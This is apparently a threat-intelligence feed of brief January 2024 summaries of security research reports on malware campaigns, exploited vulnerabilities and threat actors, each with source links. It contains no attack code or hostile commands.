- Volexity shared the details of new detailed scanning and exploitation by threat actors using still non-public exploits to compromise different devices. Subsequently, Volexity has observed an increase in attacks from various threat actors against Ivanti Connect Secure VPN appliances beginning on January 16th, 2024. The new observations were GIFTEDVISITOR webshell that Volexity scanned for, which led to the initial discovery of over 1,700 compromised Ivanti Connect Secure VPN devices. Also, UTA0178 had made modifications to the in-built Integrity Checker Tool. CISA also issued an Emergency Directive on Ivanti Vulnerabilities.
Source:
https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/
https://www.cisa.gov/news-events/alerts/2024/01/19/cisa-issues-emergency-directive-ivanti-vulnerabilities
—
- Intel Source:
- Phylum
- Intel Name:
- AnyDesk_Installed_With_OScompatible_Package_by_Npm_Trojan
- Date of Scan:
- 2024-01-19
- Impact:
- LOW
- Summary:
- An advanced remote access trojan have discovered to be installed on infected Windows computers by a malicious package that was posted to the npm registry. The software, dubbed “oscompatible,” was made available on January 9, 2024, and was downloaded 380 times in total before being removed.
Source:
https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/
—
- Intel Source:
- Security Score Card
- Intel Name:
- The_compromise_of_Cisco_devices_by_Volt_Typhoon
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Chinese state-sponsored group continues to actively compromiseCisco devices possibly affected by vulnerabilities publicly disclosed in 2019. Approximately 30% of the Cisco RV320/325 devices observed by SecurityScorecard in a 37-day period may have been compromised by Volt Typhoon. The Cisco RV320/325 vulnerability was publicly disclosed in January 2019. The devices are end-of-life, so Cisco has not released and will not release software updates to address vulnerabilities affecting them.
Source:
https://resources.securityscorecard.com/research/volt-typhoon
—
- Intel Source:
- Antiy
- Intel Name:
- A_Detailed_Analysis_of_Aquabot
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Researchers from Antiy CERT have discovered a new version of the Mirai botnet that targets a variety of architectures, including X86, ARM, and MIPS. It waits for control instructions to launch DDoS attacks after infecting targets with weak passwords. They gave it the name Aquabot since the botnet file name is derived from “Aqua*”.
Source:
https://www.antiy.cn/research/notice&report/research_report/Aquabot.html
—
- Intel Source:
- Proofpoint
- Intel Name:
- A_Massive_Email_Campaign_Brings_TA866_Back
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Researchers at Proofpoint have discovered that, following a nine-month hiatus, TA866 has returned to exploit email campaign data. Proofpoint stopped a massive campaign with thousands of emails aimed at North America on January 11, 2024. Emails with an invoice theme included PDF attachments with titles like “Document_[10 digits].pdf” and different subject lines like “Project achievements.” The PDF files included OneDrive URLs that, when clicked, started a series of steps that eventually led to the malware payload—a WasabiSeed and Screenshotter custom variant.
Source:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta866-returns-large-email-campaign
—
- Intel Source:
- Microsoft
- Intel Name:
- High_Profile_Individuals_Targeted_by_Mint_Sandstorm_Campaign
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have been tracking a specific subset of Mint Sandstorm (PHOSPHORUS) since November 2023. This subset has been observed to target prominent persons who focus on Middle Eastern politics at universities and research institutions in Belgium, France, Gaza, Israel, the United Kingdom, and the United States. During this campaign, Mint Sandstorm attempted to trick targets into downloading infected files by using custom phishing lures. Microsoft discovered novel post-intrusion techniques in a few instances, including the introduction of a brand-new, specially designed backdoor known as MediaPl.
—
- Intel Source:
- Qianxin
- Intel Name:
- A_new_variant_of_the_Mirai_malware_known_as_Rimasuta
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- A new variant of the Mirai malware, known as Rimasuta, has recently resurfaced in samples captured by 360netlab in Japan, but has undergone a significant change in its encryption algorithm.
Source:
https://blog.xlab.qianxin.com/rimasuta-new-variant-switches-to-chacha20-encryption-en/
—
- Intel Source:
- Cyble
- Intel Name:
- Info_Stealing_Malware_Potentially_Targeting_Indian_Air_Force
- Date of Scan:
- 2024-01-18
- Impact:
- HIGH
- Summary:
- Researchers at Cyble have discovered a fresh spy operation that might use malware to steal information from the Indian Air Force. The unknown threat actor lured victims with phishing emails that included a link to a malicious.zip file purporting to provide information on Su-30 fighter jets. India authorized the purchase of these aircraft last year in order to support its current defense modernization initiatives.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_Install_Mimo_CryptoMiner_And_Mimus_Ransomware
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Recently, ASEC researchers have documented instances where a CoinMiner threat actor named Mimo has installed malware by taking advantage of different vulnerabilities. In March 2022, they installed CoinMiners via a Log4Shell vulnerability exploitation, which is how Mimo, also known as Hezb, was initially discovered.
—
- Intel Source:
- CyberGeeks
- Intel Name:
- AI_generated_videos_attacked_Romania
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Cybergeeks researchers continue to see the threat for AI-generated videos in different industries and recently seen a YouTube ad that presented a “unique” opportunity to invest in stocks. The attackers used a legitimate Podcast that was modified using AI. The researchers concluded that the account promoting the unlisted video was compromised
Source:
https://cybergeeks.tech/attackers-target-romania-using-ai-generated-videos/
—
- Intel Source:
- Mcafee
- Intel Name:
- An_Overview_of_VBS_Script_Driven_Campaigns
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- Researchers at McAfee have observed a complex VBS campaign that uses obfuscated Visual Basic Scripting (VBS). After starting off as a campaign that distributed the AgentTesla malware, it has developed into a multifaceted threat that uses VBS scripts as a flexible delivery system. This campaign serves as an example of a thorough infection procedure that is started by an email-delivered VBS file. It begins with a VBS script that is activated, then it moves via PowerShell stages, using the BitsTransfer tool to retrieve a second PowerShell script.
—
- Intel Source:
- ASEC
- Intel Name:
- Spread_of_LockBit_Ransomware_Using_Word_Documents
- Date of Scan:
- 2024-01-18
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have discovered that starting last month, Word files are being used to spread the LockBit ransomware. Notably, malicious Word files were recently discovered to be masquerading as resumes, which is another way that the LockBit ransomware typically spreads. In 2022, it was discovered that the LockBit ransomware spreads using external URLs in Word documents.
—
- Intel Source:
- Esentire
- Intel Name:
- The_delivery_of_WorkersDevBackdoor
- Date of Scan:
- 2024-01-18
- Impact:
- LOW
- Summary:
- In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system.
Source:
https://www.esentire.com/blog/workersdevbackdoor-delivered-via-malvertising
—
- Intel Source:
- Checkpoint
- Intel Name:
- Microsoft_as_the_top_number_impersonated_brand
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- Last quarter of 2023 year, Microsoft was on the top spot as the number one most impersonated brand, accounting for 33% of all brand phishing attempts. The technology sector stood out as the most targeted industry overall Checkpoint researchers said.
—
- Intel Source:
- NSFocus Global
- Intel Name:
- The_New_Botnet_RDDoS
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- NSFOCUS’s Global Threat Hunting System discovered a widespread spread of an unknown elf file, leading to the identification of a new botnet named RDDoS. This botnet, primarily designed for launching DDoS attacks, possesses command execution capabilities, distinguishing it as a formidable threat. The botnet’s favored attack method is ICMP_flood, with the United States, Brazil, and France being its primary targets. The analysis reveals the botnet’s relatively uncomplicated nature, but its continuous updates and iterations pose an evolving threat. NSFOCUS emphasizes the need for heightened attention to emerging botnet families like RDDoS, emphasizing ongoing monitoring and offering an Anti-DDoS solution to counter this rising threat effectively.
Source:
https://nsfocusglobal.com/nsfocus-reveals-new-botnet-family-rddos/
—
- Intel Source:
- Sentinelone
- Intel Name:
- The_rise_of_infostealers_targeting_macOS
- Date of Scan:
- 2024-01-17
- Impact:
- MEDIUM
- Summary:
- In this post, Sentilone shared details on three active infostealers that are currently evading many static signature detection engines.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Facebook_Scammers_Exploit_BBC_Branding_in_Morbid_Scheme
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- In a recent Facebook scam, cybercriminals employ BBC branding to lure victims into a morbid scheme. The scam involves posts claiming the tragic loss of someone, accompanied by a link to a fake BBC news item about a fatal road accident. The posts tag Facebook friends to trigger curiosity. Clicking on the link redirects users through various steps, likely performing fingerprinting to gather information. The scam uses a URL format like “BBCNEWS-{6 characters}.OMH4.XYZ.” While testing, the redirection led to a known source of pop-ups, potentially unwanted programs, and fraudulent sites. The article provides tips on avoiding Facebook scams, including scrutinizing URLs, reaching out to friends outside the platform for verification, being cautious of “free” offers, regular browser updates, changing login credentials, and using browser protection tools. Users are encouraged to report suspicious posts to protect themselves and others from online threats.
—
- Intel Source:
- Russian Panda
- Intel Name:
- Atomic_Stealer_First_MacOS_Threat_Unveiled
- Date of Scan:
- 2024-01-17
- Impact:
- MEDIUM
- Summary:
- Discovered in March 2023, Atomic Stealer is the inaugural MacOS-targeting stealer, offering a sophisticated panel for $3000 monthly. Boasting advanced features such as keychain extraction, password retrieval, and browser data theft, it recently evolved with encrypted strings and anti-VM checks. The threat minimizes traces on infected devices, presenting a formidable challenge to cybersecurity. Special thanks to Edward Crowder and @cod3nym for their contributions
Source:
https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS/
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- Analysis_of_Keyholes
- Date of Scan:
- 2024-01-17
- Impact:
- LOW
- Summary:
- Keyhole is a multipurpose VNC/Backconnect component that is heavily utilized by Anubis and IcedID. Although the malware has features that have been previously documented as standard VNC and HDESK capabilities, there doesn’t seem to be much technical information available regarding some of the other features that are currently present.
Source:
https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03
—
- Intel Source:
- Cyble
- Intel Name:
- Azorult_malware_back
- Date of Scan:
- 2024-01-16
- Impact:
- LOW
- Summary:
- Cyble researchers came across the activity of old Azorult malware that was identified in 2016 and functions as an information-stealing threat. It can get diverse data, including browsing history, cookies, login credentials, and cryptocurrency details.
Source:
https://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/
—
- Intel Source:
- CISA
- Intel Name:
- Threat_actors_deployed_an_Androxgh0st_malware
- Date of Scan:
- 2024-01-16
- Impact:
- HIGH
- Summary:
- The FBI and the CISA are releasing their joint cybersecurity advisory about threat associated with threat actors deploying Androxgh0st malware. Androxgh0st malware has been observed establishing a botnet for victim identification and exploitation in target networks.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a
https://www.cisa.gov/sites/default/files/2024-01/aa24-016a-known-indicators-of-compromise-associated-with-adroxgh0st-malware_0.pdf
—
- Intel Source:
- TrendMicro
- Intel Name:
- Phemedrone_Malware_Dropped_by_Windows_SmartScreen_Bug
- Date of Scan:
- 2024-01-16
- Impact:
- LOW
- Summary:
- Trend Micro researchers discovered a malware campaign employing Phemedrone, which exploits a Microsoft Defender SmartScreen vulnerability to bypass Windows security prompts when opening URL files. This open-source info-stealer focuses on extracting data from web browsers, cryptocurrency wallets, and applications like Discord, Steam, and Telegram. The gathered data is then sent to attackers for potential malicious purposes or sale to other threat actors.
—
- Intel Source:
- ANY.RUN
- Intel Name:
- Detailed_Analysis_of_Pure_Malware_Family
- Date of Scan:
- 2024-01-16
- Impact:
- LOW
- Summary:
- Researchers from AnyRun have examined PureCrypter, one of the most peculiar crypters, and PureLogs, a multipurpose stealer. Several intriguing samples were discovered by them while they were reviewing Public Submissions. Unusual traffic that appeared to be related to encryption operations on executable files with short keys and high entropy TCP connections piqued their interest.
Source:
https://any.run/cybersecurity-blog/pure-malware-family-analysis/
—
- Intel Source:
- ASEC
- Intel Name:
- Remcos_RAT_Distributing_via_Webhards
- Date of Scan:
- 2024-01-15
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that webhards are being used to spread the Remcos RAT virus, which is masquerading as adult games. In Korea, webhards and torrents are popular delivery channels for malware.
—
- Intel Source:
- TrueSec
- Intel Name:
- A_Mallox_Ransomware_Victim
- Date of Scan:
- 2024-01-15
- Impact:
- LOW
- Summary:
- The Mallox threat actor have a history of gaining early access by taking advantage of vulnerable MSSQL servers. The initial signs of the threat actor were discovered during the analysis of an unprotected MSSQL web server. There were many dropper PowerShell scripts found in the Appdata directory for the service account that was operating the SQL service. Take the script “alta.ps1,” for example.
Source:
https://www.truesec.com/hub/blog/a-victim-of-mallox-ransomware-how-truesec-csirt-fought-back
—
- Intel Source:
- Sucuri
- Intel Name:
- WordPress_Sites_Are_Infected_by_Balada_Injector
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- In a campaign that began in mid-December, a little over 6,700 WordPress websites that used a vulnerable version of the Popup Builder plugin were compromised by the Balada Injector malware.
—
- Intel Source:
- Forescout
- Intel Name:
- Denmark_and_Ukraines_Energy_Sector_Attacks
- Date of Scan:
- 2024-01-12
- Impact:
- MEDIUM
- Summary:
- Forescout researchers have analyzed two newly publicized attacks targeting the energy sectors in Denmark and Ukraine. So far, the attacks have been linked, if tenuously, to the Russian military threat actor Sandworm, one of the most well-known APT organizations operating at the moment.
Source:
https://www.forescout.com/resources/clearing-the-fog-of-war/
—
- Intel Source:
- Trendmicro
- Intel Name:
- FIFA_World_cyber_threats
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- Trend Micro, a cybersecurity company, played a crucial role in protecting the 2022 FIFA World Cup from cyber threats. They collaborated with law enforcement, particularly INTERPOL, to monitor and report any malicious websites and scams related to the event. Their global threat intelligence was also shared to prevent attacks and mitigate risks. The article delves into the various cyber threats discovered, including fake ticketing systems, live streaming sites, survey scams, and crypto scams. By supporting INTERPOL and the World Cup, Trend Micro fulfilled its mission of making the digital world a safer place.
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_Medusa_ransomware_capabilities
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- The article discusses the Medusa ransomware and its capabilities, including the use of two drivers to target specific security products and a customized tool for remote deployment. It also mentions the use of remote scripting and Cyrillic scripts, possibly referencing the creators’ preferred language. The article provides a list of commands to stop various services on a computer to prevent the ransomware from encrypting files. It also discusses the use of string and RSA encryption for protecting the ransomware’s key. The article mentions the escalation of Medusa ransomware activities and a shift towards extortion, as well as the involvement of the Unit 42 Incident Response team in a Medusa incident. It provides protections and mitigations for Palo Alto Networks customers and discusses the tools and techniques used by the Medusa group, including webshells and defense evasion techniques.
Source:
https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0050_Armed_RemcosRAT_QuasarRAT_RemoteUtilities
- Date of Scan:
- 2024-01-12
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have located and examined numerous letters that have an attachment that is a ZIP archive bearing the same name. The latter includes a TXT file that requires a password and a password-protected multivolume RAR archive.
—
- Intel Source:
- Zscaler
- Intel Name:
- A_New_Exploit_Module_From_DreamBus_Releases_Metabase_Mayhem
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- Researchers from Zscaler’s ThreatLabz have tracked down the DreamBus malware family, which is based on Linux. Other than a few minor bug patches and slight adjustments to avoid being detected by security software, not much has changed in the last several years. To exploit weaknesses in Metabase and Apache RocketMQ, the threat actor behind DreamBus has, nevertheless, released two new modules during the past six months.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- An_Analysis_of_Phishing_Email
- Date of Scan:
- 2024-01-12
- Impact:
- LOW
- Summary:
- SANS researchers have talked on how obfuscation works in malicious scripts. They discovered a VB script that poses as a PDF document. It arrived as usual in the form of a zip archive attached to a phishing email. “rfw_po_docs_order_sheet_01_10_202400000000_pdf.vbs” is the filename.
Source:
https://isc.sans.edu/diary/One+File+Two+Payloads/30558/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Mac_users_facing_a_New_Year_threat_with_the_Obfuscated_Atomic_Stealer
- Date of Scan:
- 2024-01-11
- Impact:
- LOW
- Summary:
- Malwarebytes researchers discovered an upgraded version of the Atomic Stealer, actively targeting Mac users through malicious ads on Google Search. This insidious threat is specifically designed to harvest passwords and other sensitive files that are usually restricted in access.
—
- Intel Source:
- Volexity
- Intel Name:
- Ivanti_Connect_Secure_VPN_Exploited
- Date of Scan:
- 2024-01-11
- Impact:
- MEDIUM
- Summary:
- Researchers from Volexity have discovered that two vulnerabilities in Ivanti Connect Secure VPN devices allowing unauthenticated remote code execution are now being exploited in the wild.
—
- Intel Source:
- Sentinelone
- Intel Name:
- FBot_Malware_Targeting_Cloud_and_Payment_Services
- Date of Scan:
- 2024-01-11
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have discovered a Python-based hacking tool called FBot that is unique from previous families of cloud malware that targeting cloud services, SaaS platforms, and web servers like Office365, AWS, PayPal, Sendgrid, and Twilio.
—
- Intel Source:
- ForcePoint
- Intel Name:
- A_Novel_Advanced_Malware_Attack_on_Microsoft_Office
- Date of Scan:
- 2024-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Forcepoint X-Labs have discovered a sophisticated Microsoft Office-based attack that targets well-known corporate executives just before a nation’s general elections.
Source:
https://www.forcepoint.com/blog/x-labs/advanced-malware-attack-using-microsoft-office
—
- Intel Source:
- Esentire
- Intel Name:
- Ducktail_and_Peeling_PowerShell_Layers
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- The eSentire Threat Response Unit discovered a failed effort to infect a customer’s employee with Ducktail malware, which was directed towards digital marketing at a business services company. The employee received a private message from Ducktail distributors on LinkedIn, along with an attachment that opened a ZIP archive.
Source:
https://www.esentire.com/blog/ducktail-and-peeling-the-layers-of-powershell
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Targeting_YouTube_Channels_to_Scatter_Lumma_Stealer
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Researchers at FortiGuard Labs have identified a threat group using YouTube channels to spread a Lumma Stealer variant. This malicious actor targeting the sensitive information, along with user credentials, system details, browser data, and extensions.
Source:
https://www.fortinet.com/blog/threat-research/lumma-variant-on-youtube
—
- Intel Source:
- Garwarner
- Intel Name:
- Storm_1152_used_their_CAPTCHA_cracking_capabilities
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Microsoft’s Digital Crime Unit posted their deep analysis on how it disrupts cybercrime. In their post they discuss the case against the hackers team called Storm-1152. DCU team thinks that Storm-1152 used their CAPTCHA-cracking capabilities to assist other criminals in the massive creation of Microsoft email accounts, such as Hotmail and Outlook accounts. There were 750 MILLION email accounts created for illicit purposes.
Source:
https://garwarner.blogspot.com/2023/12/vietnams-massive-captcha-crackers-vs.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- User_agent_web_resource_connection
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Jesse La Grew, ISC SANS researcher, explained in his paper how devices are connecting to different web resources on a regular basis. And about one of method to identify what is connecting to a web resource is through a user agent.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Protection_analysis_against_GuLoader_and_RedLine_Stealer_malware
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Unit 42 Palo Alto introduced selected configuration protection techniques employed by two malware families: GuLoader and RedLine Stealer.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Year_themed_spam_emails_campaign
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Cyble researchers discovered a ZIP archive file that could potentially spread through New Year-themed spam emails. The ZIP attachment contains a shortcut file disguised as a PNG image.
Source:
https://cyble.com/blog/festive-facade-dissecting-multi-stage-malware-in-new-year-themed-lure/
—
- Intel Source:
- Securonix
- Intel Name:
- Turkish_Hackers_Target_MSSQL_servers_to_deliver_MIMIC_Ransomware
- Date of Scan:
- 2024-01-10
- Impact:
- MEDIUM
- Summary:
- Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver MIMIC ransomware payloads. The Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE which involves the targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US, EU and LATAM countries and are financially motivated.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Deep_analysis_of_a_mining_threat_spreaded_through_a_YouTube
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- This comprehensive analysis delves into the dissemination of cryptocurrency miners through a YouTube channel. Examining the tactics employed, the report reveals a concerning trend of malicious actors leveraging popular video-sharing platforms to distribute mining threats. The study explores the various evasion techniques, employed by threat actors to avoid detection. Additionally, it sheds light on the processes for generating resilient malware payloads.
—
- Intel Source:
- Aquasec
- Intel Name:
- A_new_attack_targeting_Apache_Hadoop_and_Flink_applications
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- The article discusses a new cyber attack targeting Apache Hadoop and Flink applications, which was uncovered by researchers at Aqua Nautilus. The attack involves the use of packers and rootkits to conceal the malware, making it difficult for traditional security defenses to detect. The attack exploits a misconfiguration in the ResourceManager of Hadoop YARN, allowing unauthenticated users to create and run applications.
Source:
https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker
—
- Intel Source:
- TrendMicro
- Intel Name:
- Pikabot_Malware_Thirstily_Involved_In_Spam_Campaigns
- Date of Scan:
- 2024-01-10
- Impact:
- HIGH
- Summary:
- TrendMicro researchers are actively involved in spam efforts that result in ransomware attacks using the Black Basta virus. Using a loader and a core module which allows illegal remote access and the execution of arbitrary commands over an established connection with their C&C server, they are utilizing these two components to target victims with their phishing campaigns.
Source:
https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html
—
- Intel Source:
- Cyfirma
- Intel Name:
- Syrian_Hackers_Distributing_Stealthy_C_Sharp_Based_Silver_RAT
- Date of Scan:
- 2024-01-10
- Impact:
- LOW
- Summary:
- Researchers at Cyfirma have shed light on how RAT development is changing and the nefarious actions carried out by threat actors going by the handle “Anonymous Arabic.” The group looked at the Silver RAT, which is built in C sharp and can start browsers, hidden apps, keyloggers, and other dangerous programs discreetly while evading antivirus software.
—
- Intel Source:
- Greg Lesnewich
- Intel Name:
- New_North_Korean_macOS_Backdoor
- Date of Scan:
- 2024-01-08
- Impact:
- LOW
- Summary:
- A new backdoor for Apple macOS named SpectralBlur has been found by cybersecurity experts. It overlaps with a family of malware that is known to be associated with North Korean threat actors.
Source:
https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attacks_on_Ukrainian_Servicemen_Targeting_Recruitment_to_3rd_OSHBr_And_IDF
- Date of Scan:
- 2024-01-08
- Impact:
- MEDIUM
- Summary:
- Experts from Trendmicro notified CERT-UA of the discovery of suspicious files, the majority of which had military themes. Based on the information that was obtained, CERT-UA moved to look into a number of cyberattacks that are targeting soldiers of the Armed Forces of Ukraine under the pretense of recruiting for the Israel Defense Forces (IDF) and the 3rd Separate Assault Brigade.
—
- Intel Source:
- Hunt & Hackett
- Intel Name:
- Dutch_IT_And_Telecom_Firms_Targeted_by_Turkish_Sea_Turtles_Group
- Date of Scan:
- 2024-01-08
- Impact:
- LOW
- Summary:
- The cyber espionage group Sea Turtle (also known as Teal Kurma, Marbled Dust, SILICON, and Cosmic Wolf) is detected by researchers from the Dutch security firm Hunt & Hackett targeting Kurdish websites, media, ISPs, telcos, and IT service providers in the Netherlands.
Source:
https://www.huntandhackett.com/blog/turkish-espionage-campaigns
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Unusual_Prometei_Botnet_Behavior
- Date of Scan:
- 2024-01-08
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have discovered that following several attempts at logging in with different usernames and passwords, the actor utilizing the IP
Source:
https://isc.sans.edu/diary/Suspicious+Prometei+Botnet+Activity/30538/
—
- Intel Source:
- Palo Alto
- Intel Name:
- JinxLoader_Delivers_Next_Stage_Malware_Like_Formbook_and_XLoader
- Date of Scan:
- 2024-01-05
- Impact:
- LOW
- Summary:
- Researchers from Symantec and Palo Alto Networks alerted us to the existence of JinxLoader, a new Go-based malware loader that is being used to spread next-stage payloads like XLoader and Formbook. Additionally, in November 2023, the malware was noticed, and it was reported that from April 30, 2023, it has been promoted on the hacking community Hackforums. The researchers detected an assault that employed phishing communications purporting to be from the Abu Dhabi National Oil Company (ADNOC).
Source:
https://twitter.com/Unit42_Intel/status/1730237085246775562
—
- Intel Source:
- AT&T
- Intel Name:
- Decoys_Govno_DGAs_And_Obfuscation_in_AsyncRAT_Loaders
- Date of Scan:
- 2024-01-05
- Impact:
- LOW
- Summary:
- Researchers at AT&T Alien Labs have discovered a campaign to install AsyncRAT on victim PCs without their knowledge. This threat actor has been working on distributing the RAT via an initial JavaScript file embedded in a phishing page for at least 11 months. The threat actor is steadfast in their goals even after more than 300 samples and more than 100 domains have passed.
Source:
https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno
—
- Intel Source:
- ClearSkySec
- Intel Name:
- Attack_by_Iranian_APT_using_wipers_on_Albania
- Date of Scan:
- 2024-01-05
- Impact:
- MEDIUM
- Summary:
- The Iranian psychological operation group “Homeland Justice” claimed to be eliminating “terrorist supporters” once more in a video that was uploaded to its Telegram channel on December 24, 2023, and it was shared in Albanian. Since July 2022, this gang has been active, concentrating on ransomware and damaging activities directed at Albania. The following Albanian infrastructure and government agencies’ computer systems and webpages were totally compromised and erased, the actor declared on its official website and Telegram channel the next day.
Source:
https://www.clearskysec.com/wp-content/uploads/2024/01/No-Justice-Wiper.pdf
—
- Intel Source:
- Fortinet
- Intel Name:
- Cryptomining_PyPI_Packages_Targeting_Linux
- Date of Scan:
- 2024-01-04
- Impact:
- LOW
- Summary:
- Researchers from FortiGate have noted that three new malicious packages that have the ability to install a cryptocurrency miner on vulnerable Linux computers have been found in the Python Package Index (PyPI) open-source repository.
—
- Intel Source:
- Uptycs
- Intel Name:
- UAC_0050_Targeting_Ukraine_With_Remcos_RAT_Pipe_Method
- Date of Scan:
- 2024-01-04
- Impact:
- LOW
- Summary:
- The UAC-0050 threat group, well-known for its history of unrelenting cyberattacks against targets in Ukraine, is back at it. However, this time, researchers at Uptycs have uncovered a sophisticated tactic that permits a more covert data transfer channel, successfully eluding antivirus and Endpoint Detection and Response (EDR) detection methods.
Source:
https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_summarized_malware_families_roundups
- Date of Scan:
- 2024-01-03
- Impact:
- MEDIUM
- Summary:
- This article summarizes the malware families (and groups pushing malware) seen by Unit 42. This article reviews all our timely threat intelligence released from October through December 2023.
Source:
https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/
—
- Intel Source:
- Resecurity
- Intel Name:
- The_implementation_of_Artificial_Intelligence_for_invoice_fraud
- Date of Scan:
- 2024-01-03
- Impact:
- LOW
- Summary:
- Resecurity discovered a threat actors group “GXC Team”, which is known for crafting tools for online banking theft, e-commerce deception, and internet scams. This time this group introduced a new tool that incorporates Artificial Intelligence with the creation of fraudulent invoices used for Wire fraud and Business E-Mail Compromise (BEC). According to an FBI IC3 report, successful business email compromise (BEC) scams (such as invoice fraud) resulted in an average loss of over $120,000 per incident, inflicting a staggering financial toll of more than $2.4 billion on organizations.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_malspam_attachments
- Date of Scan:
- 2024-01-03
- Impact:
- LOW
- Summary:
- John Kopriva from ISC.SANS shared his observations of over the last 12 months, 1152 potentially malicious attachments of different types that got trapped by his malspam trap. When he decompressed and/or unpacked all the images and archives, removed all duplicates, and eliminated all the non-malicious files, he was still left with 525 unique malicious samples – 285 of these were PE files with various extensions, and the rest were a wide assortment of scripts, Office files, PDFs, help files, shortcut links, etc.
—
- Intel Source:
- Fortinet
- Intel Name:
- 8base_Ransomware_Roundup
- Date of Scan:
- 2024-01-03
- Impact:
- MEDIUM
- Summary:
- The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants. 8base is a financially motivated ransomware variant most likely based on the Phobos ransomware. Per our FortiRecon information, the 8base ransomware first appeared in May 2023.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-8base
—
- Intel Source:
- Antiy
- Intel Name:
- Analysis_of_the_Ransomware_Attack_On_Boeing
- Date of Scan:
- 2024-01-03
- Impact:
- MEDIUM
- Summary:
- Antiy CERT reviewed recent major attack cases and selected the Boeing Company’s extortion attack that was linked to the LockBit group and completed a complete analysis. Antiy CERT has been monitoring attacks for a long time and made its analysis of these ransomware attacks. The researchers continued to pay attention to attack organizations such as LockBit, forming a relatively systematic analysis and accumulation. Relying on the intelligence data of the Antiy Cyber Ultrain platform, CISA, and other agencies have launched relevant public information released by this incident.
Source:
https://www.antiy.cn/research/notice&report/research_report/BoeingReport.html
—
- Intel Source:
- Cyber Security news
- Intel Name:
- The_use_of_weaponized_LNK_files_to_exploit_vulnerabilities_in_Windows
- Date of Scan:
- 2024-01-02
- Impact:
- MEDIUM
- Summary:
- Last month, cybersecurity researchers at ASEC identified that the Kimsuky group has been actively using the weaponized LNK file to deploy AppleSeed malware. Hackers use weaponized LNK files to exploit vulnerabilities in Windows operating systems. These files often contain malicious code that can be executed when the user clicks on the shortcut.
Source:
https://cybersecuritynews.com/kimsuky-appleseed-malware/
—
- Intel Source:
- Resecurity
- Intel Name:
- New_Version_Of_Medusa_Stealer_Released
- Date of Scan:
- 2024-01-02
- Impact:
- LOW
- Summary:
- Resecurity researchers observed last week the details of the New Medusa Stealer malware. The release version of Meduza is 2.2, a significantly upgraded password stealer poised to wreak havoc on unsuspecting victims. One of the new capabilities of this stealer is the support of more software clients (including browser-based cryptocurrency wallets), an upgraded credit card (CC) grabber, and additional advanced mechanisms for password storage dump on various platforms to extract credentials and tokens.
Source:
